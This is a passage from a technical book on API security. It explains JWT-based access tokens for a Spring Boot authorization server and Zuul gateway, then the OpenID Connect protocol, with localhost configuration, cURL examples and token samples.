pair along with a keystore. This key is used to sign the JWTs issued from our authorization server. The following keytool command will create a new keystore with a key pair. \> keytool -genkey -alias jwtkey -keyalg RSA -keysize 2048 -dname "CN=localhost" -keypass springboot -keystore jwt.jks -storepass springboot The preceding command creates a keystore with the name jwt.jks, protected with the password springboot. We need to copy this keystore to sample03/src/main/ resources/. Now to generate self-contained access tokens, we need to set the values of the following properties in sample03/src/main/resources/application.properties file. spring.security.oauth.jwt: true spring.security.oauth.jwt.keystore.password: springboot spring.security.oauth.jwt.keystore.alias: jwtkey spring.security.oauth.jwt.keystore.name: jwt.jks Chapter 5 edge SeCurity with an api gateway 122 The value of spring.security.oauth.jwt is set to false by default, and it has to be changed to true to issue JWTs. The other three properties are self-explanatory, and you need to set them appropriately based on the values you used in creating the keystore. Let’s go through the notable changes in the source code to support JWTs. First, in the pom.xml, we need to add the following dependency, which takes care of building JWTs. <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-jwt</artifactId> </dependency> In sample03/src/main/java/com/apress/ch05/sample03/config/ AuthorizationServerConfig.java class, we have added the following method, which takes care of injecting the details about how to retrieve the private key from the jwt.jks keystore, which we created earlier. This private key is used to sign the JWT. @Bean protected JwtAccessTokenConverter jwtConeverter() { String pwd = environment.getProperty("spring.security.oauth.jwt. keystore.password"); String alias = environment.getProperty("spring.security.oauth.jwt. keystore.alias"); String keystore = environment.getProperty("spring.security.oauth.jwt. keystore.name"); String path = System.getProperty("user.dir"); KeyStoreKeyFactory keyStoreKeyFactory = new KeyStoreKeyFactory( new FileSystemResource(new File(path + File.separator + keystore)), pwd.toCharArray()); JwtAccessTokenConverter converter = new JwtAccessTokenConverter(); converter.setKeyPair(keyStoreKeyFactory.getKeyPair(alias)); return converter; } In the same class file, we also set JwtTokenStore as the token store. The following function does it in a way, we only set the JwtTokenStore as the token store only if spring.security.oauth.jwt property is set to true in the application.properties file. Chapter 5 edge SeCurity with an api gateway 123 @Bean public TokenStore tokenStore() { String useJwt = environment.getProperty("spring.security.oauth.jwt"); if (useJwt != null && "true".equalsIgnoreCase(useJwt.trim())) { return new JwtTokenStore(jwtConeverter()); } else { return new InMemoryTokenStore(); } } Finally, we need to set the token store to AuthorizationServerEndpointsConfigurer, which is done in the following method, and once again, only if we want to use JWTs. @Autowired private AuthenticationManager authenticationManager; @Override public void configure(AuthorizationServerEndpointsConfigurer endpoints) throws Exception { String useJwt = environment.getProperty("spring.security.oauth.jwt"); if (useJwt != null && "true".equalsIgnoreCase(useJwt.trim())) { endpoints.tokenStore(tokenStore()).tokenEnhancer(jwtConeverter()) .authenticationManager(authenticationManager); } else { endpoints.authenticationManager(authenticationManager); } } To start the authorization server, use the following command from ch05/sample03/ directory, which now issues self-contained access tokens (JWTs). \> mvn spring-boot:run To get an access token using the OAuth 2.0 client credentials grant type, use the following command. Make sure to replace the values of $CLIENTID and $CLIENTSECRET appropriately. The hard-coded values for client id and client secret used in our example are 10101010 and 11110000, respectively. Chapter 5 edge SeCurity with an api gateway 124 \> curl -v -X POST --basic -u $CLIENTID:$CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=client_ credentials&scope=foo" https://localhost:8443/oauth/token The preceding command will return back a base64-url-encoded JWT, and the following shows the decoded version. { "alg": "RS256", "typ": "JWT" } { "scope": [ "foo" ], "exp": 1524793284, "jti": "6e55840e-886c-46b2-bef7- 1a14b813dd0a", "client_id": "10101010" } Only the decoded header and the payload are shown in the output, skipping the signature (which is the third part of the JWT). Since we used client_credentials grant type, the JWT does not include a subject or username. It also includes the scope value(s) associated with the token. Protecting Zuul API Gateway with JWT In this section, we’ll see how to enforce self-issued access token or JWT-based token validation at the Zuul API gateway. We only need to comment out security.oauth2. resource.user-info-uri property and uncomment security.oauth2.resource.jwt. keyUri property in sample02/src/main/resources/application.properties file. The updated application.properties file will look like the following. #security.oauth2.resource.user-info-uri:https://localhost:8443/user security.oauth2.resource.jwt.keyUri: https://localhost:8443/oauth/token_key Here the value of security.oauth2.resource.jwt.keyUri points to the public key corresponding to the private key, which is used to sign the JWT by the authorization server. It’s an endpoint hosted under the authorization server. If you just type https:// localhost:8443/oauth/token_key on the browser, you will find the public key, as shown in the following. This is the key the API gateway uses to verify the signature of the JWT included in the request. { "alg":"SHA256withRSA", "value":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMI IBCgKCAQEA+WcBjPsrFvGOwqVJd8vpV+gNx5onTyLjYx864mtIvUxO8D4mwAaYpjXJgsre2dc XjQ03BOLJdcjY5Nc9Kclea09nhFIEJDG3obwxm9gQw5Op1TShCP30Xqf8b7I738EHDFT6 Chapter 5 edge SeCurity with an api gateway 125 qABul7itIxSrz+AqUvj9LSUKEw/cdXrJeu6b71qHd/YiElUIA0fjVwlFctbw7REbi3Sy3nWdm 9yk7M3GIKka77jxw1MwIBg2klfDJgnE72fPkPi3FmaJTJA4+9sKgfniFqdMNfkyLVbOi9E3Dla oGxEit6fKTI9GR1SWX40FhhgLdTyWdu2z9RS2BOp+3d9WFMTddab8+fd4L2mYCQIDAQ AB\n-----END PUBLIC KEY-----" } Once the changes are made as highlighted earlier, let’s restart the Zuul gateway with the following command from the sample02 directory. \> mvn spring-boot:run Once we have a JWT access token obtained from the OAuth 2.0 authorization server, in the same way as we did before, with the following cURL command, we can access the protected resource. Make sure the value of $TOKEN is replaced appropriately with a valid JWT access token. \> curl -k -H "Authorization: Bearer $TOKEN" https://localhost:9443/ order/11 {"customer_id":"101021","order_id":"11","payment_method":{"card_type":"VISA", "expiration":"01/22","name":"John Doe","billing_address":"201, 1st Street, San Jose, CA"},"items":[{"code":"101","qty":1},{"code":"103","qty":5}]," shipping_address":"201, 1st Street, San Jose, CA"} The Role of a Web Application Firewall (WAF) As we discussed before, an API gateway is a policy enforcement point (PEP), which centrally enforces authentication, authorization, and throttling policies. In a public- facing API deployment, an API gateway is not just sufficient. We also need a web application firewall (WAF) sitting in front of the API gateway (see Figure 5-4). The primary role of a WAF is to protect your API deployment from distributed denial of service (DDoS) attacks—do threat detection and message validation against OpenAPI Specification (OAS) along with known threats identified by Open Web Application Security Project (OWASP). Gartner (one of the leading analyst firms) predicts that by 2020, more than 50% of public-facing web applications will be protected by cloud-based WAF service platforms such Akamai, Imperva, Cloudflare, Amazon Web Services, and so on, up from less than 20% in December 2018. Chapter 5 edge SeCurity with an api gateway 126 Summary • OAuth 2.0 is the de facto standard for securing APIs. • The API gateway is the most common pattern in securing APIs in a production deployment. In other words, it’s the entry point to your API deployment. • There are many open source and proprietary products out there, which implement the API gateway pattern, which we commonly identify as API gateways. • An OAuth 2.0 bearer token can be a reference token or self-contained token. A reference token is an arbitrary string. An attacker can carry out a brute-force attack to guess the token. The authorization server must pick the right length and use other possible measures to prevent brute forcing. Figure 5-4. A web application firewall (WAF) intercepts all the traffic coming into an API deployment Chapter 5 edge SeCurity with an api gateway 127 • When the resource server gets an access token, which is a reference token, then to validate the token, it has to talk to the authorization server (or the token issuer). When the access token is a JWT, the resource server can validate the token by itself, by verifying the signature of the JWT. • Zuul is an API gateway that provides dynamic routing, monitoring, resiliency, security, and more. It is acting as the front door to Netflix’s server infrastructure, handling traffic from all Netflix users around the world. • In a public-facing API deployment, an API gateway is not just sufficient. We also need a web application firewall (WAF) sitting in front of the API gateway. Chapter 5 edge SeCurity with an api gateway 129 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_6 CHAPTER 6 OpenID Connect (OIDC) OpenID Connect provides a lightweight framework for identity interactions in a RESTful manner and was ratified as a standard by its membership on February 26, 2014.1 It was developed under the OpenID Foundation and has its roots in OpenID, but was greatly affected by OAuth 2.0. OpenID Connect is the most popular Identity Federation protocol at the time of this writing. Most of the applications developed in the last few years are supporting OpenID Connect. Ninety-two percent of the 8 billion+ authentication requests Microsoft Azure AD handled in May 2018 were from OpenID Connect–enabled applications. From OpenID to OIDC OpenID, which followed in the footsteps of Security Assertion Markup Language (SAML) in 2005, revolutionized web authentication. Brad Fitzpatrick, the founder of LiveJournal, came up with the initial idea of OpenID. The basic principle behind both OpenID and SAML (discussed in Chapter 12) is the same. Both can be used to facilitate web single sign-on (SSO) and cross- domain identity federation. OpenID is more community- friendly, user centric, and decentralized. Yahoo! added OpenID support in January 2008, MySpace announced its support for OpenID in July of the same year, and Google joined the party in October. By December 2009, there were more than 1 billion OpenID-enabled accounts. It was a huge success as a web SSO protocol. OpenID and OAuth 1.0 address two different concerns. OpenID is about authentication, whereas OAuth 1.0 is about delegated authorization. As both of these standards were gaining popularity in their respective domains, there was an interest in 1 The announcement by the OpenID Foundation regarding the launch of the OpenID Connect standard is available at http://bit.ly/31PowsS 130 combining them, so that it would be possible to authenticate a user and also get a token to access resources on his or her behalf in a single step. The Google Step 2 project was the first serious effort in this direction. It introduced an OpenID extension for OAuth, which basically takes OAuth-related parameters in the OpenID request/response. The same people who initiated the Google Step 2 project later brought it into the OpenID Foundation. OpenID has gone through three generations to date. OpenID 1.0/1.1/2.0 was the first generation, and the OpenID extension for OAuth is the second. OpenID Connect (OIDC) is the third generation of OpenID. Yahoo!, Google, and many other OpenID providers discontinued their support for OpenID around mid-2015 and migrated to OpenID Connect. OPENID CONNECT IS NOT OPENID, THIS IS HOW OPENID WORKS! How many profiles do you maintain today at different web sites? Perhaps you have one on Yahoo!, one on Facebook, one on Google, and so on. Each time you update your mobile number or home address, either you have to update all your profiles or you risk outdating most of your profiles. OpenID solves the problem of scattered profiles on different websites. With OpenID, you maintain your profile only at your OpenID provider, and all the other sites become OpenID relying parties. These relying parties communicate with your OpenID provider to obtain your information. Each time you try to log in to a relying party website, you’re redirected to your OpenID provider. At the OpenID provider, you have to authenticate and approve the request from the relying party for your attributes. Upon approval, you’re redirected back to the relying party with the requested attributes. This goes beyond simple attribute sharing to facilitate decentralized SSO. With SSO, you only log in once at the OpenID provider. That is, when a relying party redirects you to the OpenID provider for the first time. After that, for the subsequent redirects by other relying parties, your OpenID provider doesn’t ask for credentials but uses the authenticated session you created before at the OpenID provider. This authenticated session is maintained either by a cookie until the browser is closed or with persistent cookies. Figure 6-1 illustrates how OpenID works. CHAPTEr 6 OPEnID COnnECT (OIDC) 131 The end user initiates the OpenID flow by typing his or her OpenID on the relying party web site (step 1). An OpenID is a unique UrL or an XrI (Extensible resource Identifier). For example, http://prabath.myopenid.com is an OpenID. Once the user types his or her OpenID, the relying party has to do a discovery based on it to find out the corresponding OpenID provider (step 2). The relying party performs an HTTP GET on the OpenID (which is a UrL) to get back the HTML text behind it. For example, if you view the source that is behind http:// prabath.myopenid.com, you’ll see the following tag (MyOpenID was taken down some years back). This is exactly what the relying party sees during the discovery phase. This tag indicates which OpenID provider is behind the provided OpenID: <link rel="openid2.provider" href="http://www.myopenid.com/server" /> OpenID has another way of identifying the OpenID provider, other than asking for an OpenID from the end user. This is known as directed identity, and Yahoo!, Google, and many other OpenID providers used it. If a relying party uses directed identity, it already knows who the OpenID provider is, so a discovery phase isn’t needed. The relying party lists the set of OpenID providers it supports, and the user has to pick which one it wants to authenticate against. Once the OpenID provider is discovered, the next step depends on the type of the relying party. If it’s a smart relying party, then it executes step 3 in Figure 6-1 to create an association with Figure 6-1. OpenID protocol flow CHAPTEr 6 OPEnID COnnECT (OIDC) 132 the OpenID provider. During the association, a shared secret key is established between the OpenID provider and the relying party. If a key is already established between the two parties, this step is skipped, even for a smart relying party. A dumb relying party always ignores step 3. In step 5, the user is redirected to the discovered OpenID provider. In step 6, the user has to authenticate and approve the attribute request from the relying party (steps 6 and 7). Upon approval, the user is redirected back to the relying party (step 9). A key only known to the OpenID provider and the corresponding relying party signs this response from the OpenID provider. Once the relying party receives the response, if it’s a smart relying party, it validates the signature itself. The key shared during the association phase should sign the message. If it’s a dumb relying party, it directly talks to the OpenID provider in step 10 (not a browser redirect) and asks to validate the signature. The decision is passed back to the relying party in step 11, and that concludes the OpenID protocol flow. Amazon Still Uses OpenID 2.0 Few have noticed that Amazon still uses (at the time of this writing) OpenID for user authentication. Check it out yourself: go to www.amazon.com, and click the Sign In button. Then observe the browser address bar. You see something similar to the following, which is an OpenID authentication request: https://www.amazon.com/ap/signin?_encoding=UTF8 &openid.assoc_handle=usflex &openid.claimed_id= http://specs.openid.net/auth/2.0/identifier_select &openid.identity= http://specs.openid.net/auth/2.0/identifier_select &openid.mode=checkid_setup &openid.ns=http://specs.openid.net/auth/2.0 &openid.ns.pape= http://specs.openid.net/extensions/pape/1.0 &openid.pape.max_auth_age=0 &openid.return_to=https://www.amazon.com/gp/yourstore/home CHAPTEr 6 OPEnID COnnECT (OIDC) 133 Understanding OpenID Connect OpenID Connect was built on top of OAuth 2.0. It introduces an identity layer on top of OAuth 2.0. This identity layer is abstracted into an ID token, which is JSON Web Token (JWT), and we talk about JWT in detail in Chapter 7. An OAuth 2.0 authorization server that supports OpenID Connect returns an ID token along with the access token. OpenID Connect is a profile built on top of OAuth 2.0. OAuth talks about access delegation, while OpenID Connect talks about authentication. In other words, OpenID Connect builds an identity layer on top of OAuth 2.0. Authentication is the act of confirming the truth of an attribute of a datum or entity. If I say I am Peter, I need to prove that. I can prove that with something I know, something I have, or with something I am. Once proven who I claim I am, then the system can trust me. Sometimes systems do not just want to identify end users just by the name. Name could help to identify uniquely—but how about other attributes? Before you get through the border control, you need to identify yourself—by name, by picture, and also by fingerprints and eye retina. Those are validated in real time against the data from the VISA office, which issued the VISA for you. That check will make sure it’s the same person who claimed to have the VISA that enters into the country. That is proving your identity. Proving your identity is authentication. Authorization is about what you can do or your capabilities. You could prove your identity at the border control by name, by picture, and also by fingerprints and eye retina—but it's your visa that decides what you can do. To enter into the country, you need to have a valid visa that has not expired. A valid visa is not a part of your identity, but a part of what you can do. What you can do inside the country depends on the visa type. What you do with a B1 or B2 visa differs from what you can do with an L1 or L2 visa. That is authorization. OAuth 2.0 is about authorization—not about authentication. With OAuth 2.0, the client does not know about the end user (only exception is resource owner password credentials grant type, which we discussed in Chapter 4). It simply gets an access token to access a resource on behalf of the user. With OpenID Connect, the client will get an ID token along with the access token. ID token is a representation of the end user’s identity. What does it mean by securing an API with OpenID Connect? Or is it totally meaningless? OpenID Connect is at the application level or at the client level—not at the API level or at the resource server level. OpenID Connect helps client or the application to find out who the end user is, but for the API that is meaningless. The only thing API expects is the CHAPTEr 6 OPEnID COnnECT (OIDC) 134 access token. If the resource owner or the API wants to find who the end user is, it has to query the authorization server or rely on a self-contained access token (which is a JWT). Anatomy of the ID Token The ID token is the primary add-on to OAuth 2.0 to support OpenID Connect. It’s a JSON Web Token (JWT) that transports authenticated user information from the authorization server to the client application. Chapter 7 delves deeper into JWT. The structure of the ID token is defined by the OpenID Connect specification. The following shows a sample ID token: { "iss":"https://auth.server.com", "sub":"prabath@apache.org", "aud":"67jjuyuy7JHk12", "nonce":"88797jgjg32332", "exp":1416283970, "iat":1416281970, "auth_time":1311280969, "acr":"urn:mace:incommon:iap:silver", "amr":"password", "azp":"67jjuyuy7JHk12" } Let’s examine the definition of each attribute: • iss: The token issuer’s (authorization server or identity provider) identifier in the format of an HTTPS URL with no query parameters or URL fragments. In practice, most of the OpenID Provider implementations or products let you configure an issuer you want— and also this is mostly being used as an identifier, rather than a URL. This is a required attribute in the ID token. • sub: The token issuer or the asserting party issues the ID token for a particular entity, and the claims set embedded into the ID token normally represents this entity, which is identified by the sub parameter. The value of the sub parameter is a case-sensitive string value and is a required attribute in the ID token. CHAPTEr 6 OPEnID COnnECT (OIDC) 135 • aud: The audience of the token. This can be an array of identifiers, but it must have the OAuth client ID in it; otherwise, the client ID should be added to the azp parameter, which we discuss later in this section. Prior to any validation check, the OpenID client must first see whether the particular ID token is issued for its use and if not should reject immediately. In other words, you need to check whether the value of the aud attribute matches with the OpenID client’s identifier. The value of the aud parameter can be a case-sensitive string value or an array of strings. This is a required attribute in the ID token. • nonce: A new parameter introduced by the OpenID Connect specification to the initial authorization grant request. In addition to the parameters defined in OAuth 2.0, the client application can optionally include the nonce parameter. This parameter was introduced to mitigate replay attacks. The authorization server must reject any request if it finds two requests with the same nonce value. If a nonce is present in the authorization grant request, then the authorization server must include the same value in the ID token. The client application must validate the value of the nonce once it receives the ID token from the authorization server. • exp: Each ID token carries an expiration time. The recipient of the ID token must reject it, if that token has expired. The issuer can decide the value of the expiration time. The value of the exp parameter is calculated by adding the expiration time (from the token issued time) in seconds to the time elapsed from 1970-01-01T00:00:00Z UTC to the current time. If the token issuer’s clock is out of sync with the recipient’s clock (irrespective of their time zone), then the expiration time validation could fail. To fix that, each recipient can add a couple of minutes as the clock skew during the validation process. This is a required attribute in the ID token. • iat: The iat parameter in the ID token indicates the issued time of the ID token as calculated by the token issuer. The value of the iat parameter is the number of seconds elapsed from 1970-01-01T00:00:00Z UTC to the current time, when the token is issued. This is a required attribute in the ID token. CHAPTEr 6 OPEnID COnnECT (OIDC) 136 • auth_time: The time at which the end user authenticates with the authorization server. If the user is already authenticated, then the authorization server won’t ask the user to authenticate back. How a given authorization server authenticates the user, and how it manages the authenticated session, is outside the scope of OpenID Connect. A user can create an authenticated session with the authorization server in the first login attempt from a different application, other than the OpenID client application. In such cases, the authorization server must maintain the authenticated time and include it in the parameter auth_time. This is an optional parameter. • acr: Stands for authentication context class reference. The value of this parameter must be understood by both the authorization server and the client application. It gives an indication of the level of authentication. For example, if the user authenticates with a long- lived browser cookie, it is considered as level 0. OpenID Connect specification does not recommend using an authentication level of 0 to access any resource of any monetary value. This is an optional parameter. • amr: Stands for authentication method references. It indicates how the authorization server authenticates the user. It may consist of an array of values. Both the authorization server and the client application must understand the value of this parameter. For example, if the user authenticates at the authorization server with username/password and with one-time passcode over SMS, the value of amr parameter must indicate that. This is an optional parameter. • azp: Stands for authorized party. It’s needed when there is one audience (aud) and its value is different from the OAuth client ID. The value of azp must be set to the OAuth client ID. This is an optional parameter. Note The authorization server must sign the ID token, as defined in JSOn Web Signature (JWS) specification. Optionally, it can also be encrypted. Token encryption should follow the rules defined in the JSOn Web Encryption (JWE) specification. If the ID token is encrypted, it must be signed first and then encrypted. This is because signing the encrypted text is questionable in many legal entities. Chapters 7 and 8 talk about JWT, JWS, and JWE. CHAPTEr 6 OPEnID COnnECT (OIDC) 137 OPENID CONNECT WITH WSO2 IDENTITY SERVER In this exercise, you see how to obtain an OpenID Connect ID token along with an OAuth 2.0 access token. Here we run the WSO2 Identity Server as the OAuth 2.0 authorization server. Note WSO2 Identity Server is a free, open source identity and entitlement management server, released under the Apache 2.0 license. At the time of this writing, the latest released version is 5.9.0 and runs on Java 8. Follow these steps to register your application as a service provider in WSO2 Identity Server and then log in to your application via OpenID Connect: 1. Download WSO2 Identity Server 5.9.0 from http://wso2.com/products/ identity-server/, set up the JAVA_HOME environment variable, and start the server from the wso2server.sh/wso2server.bat file in the WSO2_IS_HOME/ bin directory. If the WSO2 Identity Server 5.9.0 isn’t available from the main download page, you can find it at http://wso2.com/more-downloads/ identity-server/. 2. By default, the WSO2 Identity Server starts on HTTPS port 9443. 3. Log in to the Identity Server running at https://localhost:9443 with its default username and password (admin/admin). 4. To get an OAuth 2.0 client ID and a client secret for a client application, you need to register it as a service provider on the OAuth 2.0 authorization server. Choose Main ➤ Service Providers ➤ Add. Enter a name, say, oidc-app, and click register. 5. Choose Inbound Authentication Configuration ➤ OAuth and OpenID Connect Configuration ➤ Configure. 6. Uncheck all the grant types except Code. Make sure the OAuth version is set to 2.0. 7. Provide a value for the Callback Url text box—say, https://localhost/ callback—and click Add. 8. Copy the values of OAuth Client Key and the OAuth Client Secret. CHAPTEr 6 OPEnID COnnECT (OIDC) 138 9. You use cUrL here instead of a full-blown web application. First you need to get an authorization code. Copy the following UrL, and paste it into a browser. replace the values of client_id and redirect_uri appropriately. note that here we are passing the openid as the value of the scope parameter in the request. This is a must to use OpenID Connect. You’re directed to a login page where you can authenticate with admin/admin and then approve the request by the client: https://localhost:9443/oauth2/authorize? response_type=code&scope=openid& client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya& redirect_uri=https://localhost/callback 10. Once approved, you’re redirected back to the redirect_uri with the authorization code, as shown here. Copy the value of the authorization code: https://localhost/callback?code=577fc84a51c2aceac2a9e2f723f0f47f 11. now you can exchange the authorization code from the previous step for an ID token and an access token. replace the value of client_id, client_secret, code, and redirect_uri appropriately. The value of –u is constructed as client_id:client_secret: curl -v -X POST --basic -u NJ0LXcfdOW2...:EsSP5GfYliU96MQ6... -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -k -d "client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya& grant_type=authorization_code& code=577fc84a51c2aceac2a9e2f723f0f47f& redirect_uri=https://localhost/callback" https://localhost:9443/oauth2/token This results in the following JSOn response: { "scope":"openid", "token_type":"bearer", "expires_in":3299, "refresh_token":"1caf88a1351d2d74093f6b84b8751bb", CHAPTEr 6 OPEnID COnnECT (OIDC) 139 "id_token":"eyJhbGciOiJub25......", "access_token":"6cc611211a941cc95c0c5caf1385295" } 12. The value of id_token is base64url-encoded. Once it’s base64url-decoded, it looks like the following. Also you can use an online tool like https://jwt.io to decode the ID token: { "alg":"none", "typ":"JWT" }. { "exp":1667236118, "azp":"NJ0LXcfdOW20EvD6DU0l0p01u_Ya", "sub":"admin@carbon.super", "aud":"NJ0LXcfdOW20EvD6DU0l0p01u_Ya", "iss":"https://localhost:9443/oauth2endpoints/token", "iat":1663636118 } OpenID Connect Request The ID token is the heart of OpenID Connect, but that isn’t the only place where it deviates from OAuth 2.0. OpenID Connect introduced some optional parameters to the OAuth 2.0 authorization grant request. The previous exercise didn’t use any of those parameters. Let’s examine a sample authorization grant request with all the optional parameters: https://localhost:9443/oauth2/authorize?response_type=code& scope=openid& client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya& redirect_uri= https://localhost/callback& response_mode=.....& nonce=.....& display=....& prompt=....& max_age=.....& ui_locales=.....& CHAPTEr 6 OPEnID COnnECT (OIDC) 140 id_token_hint=.....& login_hint=.....& acr_value=..... Let’s review the definition of each attribute: • response_mode: Determines how the authorization server sends back the parameters in the response. This is different from the response_ type parameter, defined in the OAuth 2.0 core specification. With the response_type parameter in the request, the client indicates whether it expects a code or a token. In the case of an authorization code grant type, the value of response_type is set to code, whereas with an implicit grant type, the value of response_type is set to token. The response_mode parameter addresses a different concern. If the value of response_mode is set to query, the response parameters are sent back to the client as query parameters appended to the redirect_ uri; and if the value is set to fragment, then the response parameters are appended to the redirect_uri as a URI fragment. • nonce: Mitigates replay attacks. The authorization server must reject any request if it finds two requests with the same nonce value. If a nonce is present in the authorization grant request, then the authorization server must include the same value in the ID token. The client application must validate the value of the nonce once it receives the ID token from the authorization server. • display: Indicates how the client application expects the authorization server to display the login page and the user consent page. Possible values are page, popup, touch, and wap. • prompt: Indicates whether to display the login or the user consent page at the authorization server. If the value is none, then neither the login page nor the user consent page should be presented to the user. In other words, it expects the user to have an authenticated session at the authorization server and a preconfigured user consent. If the value is login, the authorization server must reauthenticate the user. If the value is consent, the authorization server must display the user consent page to the end user. The select_account option can be CHAPTEr 6 OPEnID COnnECT (OIDC) 141 used if the user has multiple accounts on the authorization server. The authorization server must then give the user an option to select from which account he or she requires attributes. • max_age: In the ID token there is a parameter that indicates the time of user authentication (auth_time). The max_age parameter asks the authorization server to compare that value with max_age. If it’s less than the gap between the current time and max_age (current time- max_age), the authorization server must reauthenticate the user. When the client includes the max_age parameter in the request, the authorization server must include the auth_time parameter in the ID token. • ui_locales: Expresses the end user’s preferred language for the user interface. • id_token_hint: An ID token itself. This could be an ID token previously obtained by the client application. If the token is encrypted, it has to be decrypted first and then encrypted back by the public key of the authorization server and then placed into the authentication request. If the value of the parameter prompt is set to none, then the id_token_hint could be present in the request, but it isn’t a requirement. • login_hint: This is an indication of the login identifier that the end user may use at the authorization server. For example, if the client application already knows the email address or phone number of the end user, this could be set as the value of the login_hint. This helps provide a better user experience. • acr_values: Stands for authentication context reference values. It includes a space-separated set of values that indicates the level of authentication required at the authorization server. The authorization server may or may not respect these values. Note All OpenID Connect authentication requests must have a scope parameter with the value openid. CHAPTEr 6 OPEnID COnnECT (OIDC) 142 Requesting User Attributes OpenID Connect defines two ways to request user attributes. The client application can either use the initial OpenID Connect authentication request to request attributes or else later talk to a UserInfo endpoint hosted by the authorization server. If it uses the initial authentication request, then the client application must include the requested claims in the claims parameter as a JSON message. The following authorization grant request asks to include the user’s email address and the given name in the ID token: https://localhost:9443/oauth2/authorize? response_type=code& scope=openid& client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya& redirect_uri=https://localhost/callback& claims={ "id_token": { "email": {"essential": true}, "given_name": {"essential": true}, } } Note The OpenID Connect core specification defines 20 standard user claims. These identifiers should be understood by all of the authorization servers and client applications that support OpenID Connect. The complete set of OpenID Connect standard claims is defined in Section 5.1 of the OpenID Connect core specification, available at http://openid.net/specs/openid-connect-core-1_0.html. The other approach to request user attributes is via the UserInfo endpoint. The UserInfo endpoint is an OAuth 2.0-protected resource on the authorization server. Any request to this endpoint must carry a valid OAuth 2.0 token. Once again, there are two ways to get user attributes from the UserInfo endpoint. The first approach is to use the OAuth access token. With this approach, the client must specify the corresponding attribute scope in the authorization grant request. The OpenID Connect specification defines four scope values to request attributes: profile, email, address, and phone. If the scope value is set to profile, that implies that the client requests access to a set of CHAPTEr 6 OPEnID COnnECT (OIDC) 143 attributes, which includes name, family_name, given_name, middle_name, nickname, preferred_username, profile, picture, website, gender, birthdate, zoneinfo, locale, and updated_at. The following authorization grant request asks permission to access a user’s email address and phone number: Note The UserInfo endpoint must support both HTTP GET and POST. All communication with the UserInfo endpoint must be over Transport Layer Security (TLS). https://localhost:9443/oauth2/authorize? response_type=code &scope=openid phone email &client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya &redirect_uri=https://localhost/callback This results in an authorization code response. Once the client application has exchanged the authorization code for an access token, by talking to the token endpoint of the authorization server, it can use the access token it received to talk to the UserInfo endpoint and get the user attributes corresponding to the access token: GET /userinfo HTTP/1.1 Host: auth.server.com Authorization: Bearer SJHkhew870hooi90 The preceding request to the UserInfo endpoint results in the following JSON message, which includes the user’s email address and phone number: HTTP/1.1 200 OK Content-Type: application/json { "phone": "94712841302", "email": "joe@authserver.com", } CHAPTEr 6 OPEnID COnnECT (OIDC) 144 The other way to retrieve user attributes from the UserInfo endpoint is through the claims parameter. The following example shows how to retrieve the email address of the user by talking to the OAuth-protected UserInfo endpoint: POST /userinfo HTTP/1.1 Host: auth.server.com Authorization: Bearer SJHkhew870hooi90 claims={ "userinfo": { "email": {"essential": true} } } Note Signing or encrypting the response message from the UserInfo endpoint isn’t a requirement. If it’s signed or encrypted, then the response should be wrapped in a JWT, and the Content-Type of the response should be set to application/jwt. OpenID Connect Flows All the examples in this chapter so far have used an authorization code grant type to request an ID token—but it isn’t a requirement. In fact OpenID Connect, independent of OAuth 2.0 grant types, defined a set of flows: code flow, implicit flow, and hybrid flow. Each of the flows defines the value of the response_type parameter. The response_type parameter always goes with the request to the authorize endpoint (in contrast the grant_ type parameter always goes to the token endpoint), and it defines the expected type of response from the authorize endpoint. If it is set to code, the authorize endpoint of the authorization server must return a code, and this flow is identified as the authorization code flow in OpenID Connect. For implicit flow under the context of OpenID Connect, the value of response_type can be either id_token or id_token token (separated by a space). If it’s just id_token, then the authorization server returns an ID token from the authorize endpoint; if it includes both, then both the ID token and the access token are included in the response. CHAPTEr 6 OPEnID COnnECT (OIDC) 145 The hybrid flow can use different combinations. If the value of response_type is set to code id_token (separated by a space), then the response from the authorize endpoint includes the authorization code as well as the id_token. If it’s code token (separated by a space), then it returns the authorization code along with an access token (for the UserInfo endpoint). If response_type includes all three (code token id_token), then the response includes an id_token, an access token, and the authorization code. Table 6-1 summarizes this discussion. Table 6-1. OpenID Connect Flows Type of Flow response_type Tokens Returned Authorization code code Authorization code Implicit id_token ID token Implicit id_token token ID token and access token Hybrid code id_token ID token and authorization code Hybrid code id_token token ID token, authorization code, and access token Hybrid code token Access token and authorization code Note When id_token is being used as the response_type in an OpenID Connect flow, the client application never has access to an access token. In such a scenario, the client application can use the scope parameter to request attributes, and those are added to the id_token. Requesting Custom User Attributes As discussed before, OpenID Connect defines 20 standard claims. These claims can be requested via the scope parameter or through the claims parameter. The only way to request custom-defined claims is through the claims parameter. The following is a sample OpenID Connect request that asks for custom-defined claims: https://localhost:9443/oauth2/authorize?response_type=code &scope=openid &client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya CHAPTEr 6 OPEnID COnnECT (OIDC) 146 &redirect_uri=https://localhost/callback &claims= { "id_token": { "http://apress.com/claims/email": {"essential": true}, "http://apress.com/claims/phone": {"essential": true}, } } OpenID Connect Discovery At the beginning of the chapter, we discussed how OpenID relying parties discover OpenID providers through the user-provided OpenID (which is a URL). OpenID Connect Discovery addresses the same concern, but in a different way (see Figure 6-2). In order to authenticate users via OpenID Connect, the OpenID Connect relying party first needs to figure out what authorization server is behind the end user. OpenID Connect utilizes the WebFinger (RFC 7033) protocol for this discovery. Note The OpenID Connect Discovery specification is available at http:// openid.net/specs/openid-connect-discovery-1_0.html. If a given OpenID Connect relying party already knows who the authorization server is, it can simply ignore the discovery phase. CHAPTEr 6 OPEnID COnnECT (OIDC) 147 Let’s assume a user called Peter visits an OpenID Connect relying party and wants to log in (see Figure 6-2). To authenticate Peter, the OpenID Connect relying party should know the authorization server corresponding to Peter. To discover this, Peter has to provide to the relying party some unique identifier that relates to him. Using this identifier, the relying party should be able to find the WebFinger endpoint corresponding to Peter. Let’s say that the identifier Peter provides is his email address, peter@apress.com (step 1). The relying party should be able to find enough detail about the WebFinger endpoint using Peter’s email address. In 